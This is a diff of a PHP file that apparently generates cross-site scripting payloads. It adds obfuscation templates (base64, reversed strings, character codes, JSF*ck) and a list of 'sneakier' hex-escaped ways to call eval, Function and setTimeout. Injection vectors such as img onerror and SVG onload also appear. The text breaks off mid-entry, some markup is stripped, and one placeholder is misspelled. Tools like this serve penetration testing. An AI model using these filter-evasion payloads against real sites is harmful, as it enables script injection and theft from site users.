diff --git a/generator.php b/generator.php
index f464482..637f4e2 100644
--- a/generator.php
+++ b/generator.php
@@ -70,34 +70,87 @@
"code" => "{payload}"
],
[
- "name" => "String eval",
- "desc" => "Pass the payload as a string into eval()",
- "code" => "eval('{payload}')"
+ "name" => "Pass as string",
+ "desc" => "Pass the payload as a string into an execution method",
+ "code" => "'{payload}'"
],
[
"name" => "Base64 (atob())",
- "desc" => "Base64 encode and execute using eval()",
- "code" => "eval(atob('{payloadb64}'))"
+ "desc" => "Base64 encode",
+ "code" => "atob('{payloadb64}')"
],
[
"name" => "Reverse",
"desc" => "Reverse payload string and execute using eval()",
- "code" => "eval('{payloadrev}'.split('').reverse().join(''))"
+ "code" => "'{payloadrev}'.split('').reverse().join('')"
],
[
"name" => "String.fromCharCode()",
"desc" => "Build payload string one char at a time using the ordinal value",
- "code" => "eval({payloadchr})"
+ "code" => "{payloadchr}"
],
[
"name" => "Character hex codes",
"desc" => "Construct the payload using hex value of each character",
- "code" => "eval('{payloadhex}')"
+ "code" => "'{payloadhex}'"
],
[
"name" => "JSF*ck",
"desc" => "Encode payload using only the characters []()!+",
- "code" => "eval({payloadjsf})"
+ "code" => "{payloadjsf}"
+ ]
+ ];
+
+ $aExecution = [
+ [
+ "name" => "None",
+ "desc" => "No execution required",
+ "code" => "{obfuscated}"
+ ],
+ [
+ "name" => "eval()",
+ "desc" => "Pass string to eval() function",
+ "code" => "eval({obfuscated})"
+ ],
+ [
+ "name" => "window['eval']()",
+ "desc" => "Slightly sneakier way of calling eval()",
+ "code" => "window['eval']({obfuscated})"
+ ],
+ [
+ "name" => "window['\\x65\\x76\\x61\\x6c']()",
+ "desc" => "Even sneakier way of calling eval()",
+ "code" => "window['\\x65\\x76\\x61\\x6c']({obfuscated})"
+ ],
+ [
+ "name" => "Function()()",
+ "desc" => "Declare and execute an anonymous function",
+ "code" => "Function({obfuscated})()"
+ ],
+ [
+ "name" => "window['Function']()()",
+ "desc" => "Slightly sneakier way of creating a new anonymous function",
+ "code" => "window['Function']({obfsucated})()"
+ ],
+ [
+ "name" => "window['\\x46\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e']()()",
+ "desc" => "Even sneakier way of creating a new anonymous function",
+ "code" => "window['\\x46\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e']({obfuscated})()"
+ ],
+ [
+ "name" => "setTimeout()",
+ "desc" => "Pass code string to the setTimeout() function",
+ "code" => "setTimeout({obfuscated},0)"
+ ],
+ [
+ "name" => "window['setTimeout']()",
+ "desc" => "Slightly sneakier way of calling the setTimeout() function",
+ "code" => "window['setTimeout']({obfuscated},0)"
+ ],
+ [
+ "name" => "window['\\x73\\x65\\x74\\x54\\x69\\x6d\\x65\\x6f\\x75\\x74']()",
+ "desc" => "Even sneakier way of calling the setTimeout() function",
+ "code" => "window['\\x73\\x65\\x74\\x54\\x69\\x6d\\x65\\x6f\\x75\\x74']({obfuscated},0)"
]
];
@@ -130,22 +183,22 @@
[
"name" => "img element onerror",
"desc" => "Inject an invalid ![]()
element with the payload within onerror",
- "code" => "
"
+ "code" => ""
],
[
"name" => "SVG element",
"desc" => "Inject an SVG element containing the payload within onload",
- "code" => "